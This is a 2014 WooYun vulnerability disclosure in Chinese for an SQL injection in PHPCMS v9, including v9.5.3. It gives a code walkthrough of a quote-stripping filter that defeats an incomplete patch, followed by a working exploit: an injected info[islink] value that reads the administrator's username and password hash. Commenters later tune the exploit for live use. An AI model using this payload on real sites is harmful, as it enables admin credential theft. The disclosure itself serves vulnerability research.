当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(117) 关注此漏洞

缺陷编号: WooYun-2014-50636

漏洞标题: PHPCMS全版本通杀SQL注入漏洞

相关厂商: phpcms

漏洞作者: felixk3y

提交时间: 2014-02-11 10:52

公开时间: 2014-05-12 10:52

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: PHPCMS SQL注入漏洞

22人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-11: 细节已通知厂商并且等待厂商处理中
2014-02-11: 厂商已经确认,细节仅向厂商公开
2014-02-14: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-04-07: 细节向核心白帽子及相关领域专家公开
2014-04-17: 细节向普通白帽子公开
2014-04-27: 细节向实习白帽子公开
2014-05-12: 细节向公众公开

简要描述:

上次你们太不给力了,这次再来个通杀v9的SQL注入,包括最新v9.5.3版本

详细说明:

#漏洞产生

总的来说,是因为你们修复不完善,并没有理解到这个SQL注入的真正原因,同时 补丁后 并没有进行相应的测试 因而可绕过补丁 继续注入...



#漏洞分析

首先看下面的代码

/phpcms/modules/member/content.php 202行 edit函数

code 区域
public function edit() {


	$_username = $this->memberinfo['username'];


	if(isset($_POST['dosubmit'])) {


		$catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);


		$siteids = getcache('category_content', 'commons');


		$siteid = $siteids[$catid];


		$CATEGORYS = getcache('category_content_'.$siteid, 'commons');


		$category = $CATEGORYS[$catid];


		if($category['type']==0) {//审核状态时,点编辑 再提交,进入if分支


			$id = intval($_POST['id']);


			$catid = $_POST['info']['catid'] = intval($_POST['info']['catid']);


			$this->content_db = pc_base::load_model('content_model');


			$modelid = $category['modelid'];


			$this->content_db->set_model($modelid);


			//判断会员组投稿是否需要审核


			$memberinfo = $this->memberinfo;


			$grouplist = getcache('grouplist');


			$setting = string2array($category['setting']);


			if(!$grouplist[$memberinfo['groupid']]['allowpostverify'] || $setting['workflowid']) {


				$_POST['info']['status'] = 1;


			}


			$info = array();


			foreach($_POST['info'] as $_k=>$_v) {


				if(in_array($_k, $fields)) $_POST['info'][$_k] = new_html_special_chars(trim_script($_v));


			}





			$_POST['linkurl'] = str_replace(array('"','(',')',",",' '),'',new_html_special_chars($_POST['linkurl']));


			//exit(print_r($_POST['info']));


			$this->content_db->edit_content($_POST['info'],$id);


			$forward = $_POST['forward'];


			showmessage(L('update_success'),$forward);


		}


	} else {


		//...


}



229行

code 区域
$this->content_db->edit_content($_POST['info'],$id);



其中 $_POST['info'] 参数是一个数组,其内容是在线投稿的各项内容,如图所示

1.jpg



好了,接下来我们看看这些数据都经过了怎样的处理...

跟上edit_content函数

/phpcms/model/content_model.class.php 第234行开始

code 区域
public function edit_content($data,$id) {


		$model_tablename = $this->model_tablename;


		//前台权限判断


		if(!defined('IN_ADMIN')) {


			$_username = param::get_cookie('_username');


			$us = $this->get_one(array('id'=>$id,'username'=>$_username));


			if(!$us) return false;


		}





		$this->search_db = pc_base::load_model('search_model');





		require_once CACHE_MODEL_PATH.'content_input.class.php';


        require_once CACHE_MODEL_PATH.'content_update.class.php';


		$content_input = new content_input($this->modelid);


		$inputinfo = $content_input->get($data);//跟进此函数


		// /caches/caches_model/caches_data/content_input.class.php get函数





		$systeminfo = $inputinfo['system'];



第248行,我们可以看到 $_POST['info'] 数组进入了 get 函数,继续跟进

/caches/caches_model/caches_data/content_input.class.php 第55行开始

code 区域
if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);


$MODEL = getcache('model', 'commons');


$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';


if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));


$func = $this->fields[$field]['formtype'];


if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明


if($this->fields[$field]['issystem']) {


	$info['system'][$field] = $value;


} else {


	$info['model'][$field] = $value;


}



我们重点关注这里是怎么处理的

code 区域
if(method_exists($this, $func)) $value = $this->$func($field, $value);



为了方便看清楚程序在这里究竟是怎样处理的,我们在这行代码前面加入以下调试代码,看看都经过了哪些函数的处理...

code 区域
if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);


$MODEL = getcache('model', 'commons');


$this->db->table_name = $this->fields[$field]['issystem'] ? $this->db_pre.$MODEL[$this->modelid]['tablename'] : $this->db_pre.$MODEL[$this->modelid]['tablename'].'_data';


if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value),$field) && ROUTE_A != 'edit') showmessage($name.L('the_value_must_not_repeat'));


$func = $this->fields[$field]['formtype'];


echo "<br>Function :-->".$func."<--<br>";//这是添加的调试代码


if(method_exists($this, $func)) $value = $this->$func($field, $value);//这里是关键,后面慢慢说明


if($this->fields[$field]['issystem']) {


	$info['system'][$field] = $value;


} else {


	$info['model'][$field] = $value;


}



编辑投稿内容,提交

2.jpg



看见了吧,我们提交的内容经过了如下几个函数:catid title keyword copyform textarea editor image islink box

经过分析后,我们重点关注image函数,继续跟上

/caches/caches_model/caches_data/content_input.class.php 第102行 image函数

code 区域
function image($field, $value) {


    $value = str_replace(array("'",'"','(',')'),'',$value);


    return trim($value);


}



过滤了"'"、"("、")",但是呢 我们知道当开启了GPC的时候,单引号会被转义 '-->\'

明白了吧? image函数过滤了单引号,假设我们提交的数据恰巧经过了image函数,则单引号被过滤了,留下"\",那么这个"\"将会吃掉一个单引号,造成注入

#3 漏洞Poc

条件:后台开启投稿,并要求审核

step1 在会员中心随便投一篇文章,提交

step2 点击编辑,如下

1.jpg



step3 在缩略图栏填入 http://**.**.**.**/sql.jpg',如图

2.jpg



提交后,报错了...

22.jpg



# 漏洞最终利用Exp

在缩略图栏填入:http://**.**.**.**/sql.jpg'

点击提交,采用Tamper data抓包修改,将info[islink]修改为

code 区域
,title=(select concat(username,password) from v9_admin where userid=1) -- felixk3y



点击确定,再点编辑 即可读取管理员账号 密码,如图

exp.jpg









漏洞证明:

exp.jpg

修复方案:

必须给力啊.

版权声明:转载请注明来源 felixk3y@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-02-11 11:48

厂商回复:

感谢反馈!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-02-11 10:56 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    1

    ......

    1# 回复此人
  2. 2014-02-11 10:59 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    0

    求详情~

    2# 回复此人
  3. 2014-02-11 11:03 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
    0

    碉堡了

    3# 回复此人
  4. 2014-02-11 11:15 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
    0

    要火.

    4# 回复此人
  5. 2014-02-11 11:30 | kow ( 路人 | Rank:29 漏洞数:4 | 研表究明,汉字的序顺并不定一能影阅响读,...)
    0

    mark

    5# 回复此人
  6. 2014-02-11 11:43 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝,双手和大脑。)
    0

    坐等公开。。

    6# 回复此人
  7. 2014-02-11 14:17 | 乌云一哥 ( 路人 | Rank:7 漏洞数:1 | echo file_get_contents('http://www.wooyu...)
    0

    很牛逼的样子啊

    7# 回复此人
  8. 2014-02-12 16:38 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)
    0

    大牛那么厉害..只有我没长进.. :(

    8# 回复此人
  9. 2014-02-13 00:13 | cmd2k ( 路人 | Rank:4 漏洞数:1 | 学习,努力,加油)
    0

    t00ls看到了。

    9# 回复此人
  10. 2014-02-19 12:11 | Windy ( 实习白帽子 | Rank:34 漏洞数:12 | 苦逼的民工)
    0

    坐等

    10# 回复此人
  11. 2014-03-07 16:03 | webvul ( 路人 | Rank:4 漏洞数:2 )
    0

    坐等公开

    11# 回复此人
  12. 2014-03-11 14:08 | Sa7ael ( 路人 | Rank:0 漏洞数:2 )
    0

    -.-

    12# 回复此人
  13. 2014-04-08 10:16 | 進撃のDanny ( 普通白帽子 | Rank:146 漏洞数:14 | )
    0

    http://loudong.360.cn/vul/info/id/2558 360上已公开的漏洞提交到这里来有什么意思。。

    13# 回复此人
  14. 2014-04-08 10:26 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)
    0

    @進撃のDanny 请你仔细看,这个漏洞报上去官方的修复方案是:过滤了转向连接那里,但由于这里还存在一个隐藏的参数,因此还可以继续利用,同时请你看详细说明的开头 也有相应的说明,是由于修复不完善造成的。谢谢

    14# 回复此人
  15. 2014-05-04 00:00 | 楼下小黑 ( 路人 | Rank:0 漏洞数:1 | 高智商白痴)
    0

    好牛X的样子

    15# 回复此人
  16. 2014-05-12 13:42 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享!)
    0

    现在很多会员中心 关闭的 鸡肋 像DEDE

    16# 回复此人
  17. 2014-05-14 23:11 | 好基友一辈子 ( 普通白帽子 | Rank:274 漏洞数:68 )
    0

    冻住霸气,不过话说v9我就没注册成功过,不是禁止注册就是操作失败,什么也不提示,人品不行

    17# 回复此人
  18. 2015-06-04 05:36 | 探狗 ( 路人 | Rank:4 漏洞数:3 | 报!!探狗飞报!!!)
    0

    这个exp要修改下,不然所有userid=1发的文章,都会被干掉。最好是where 文章id=文章id

    18# 回复此人
  19. 2015-06-04 05:39 | 探狗 ( 路人 | Rank:4 漏洞数:3 | 报!!探狗飞报!!!)
    1

    @felixk3y 这个exp要修改下,不然所有userid=1发的文章,都会被干掉。最好是后面加上where 文章id=文章id 实战结果。

    19# 回复此人

登录后才能发表评论,请先 登录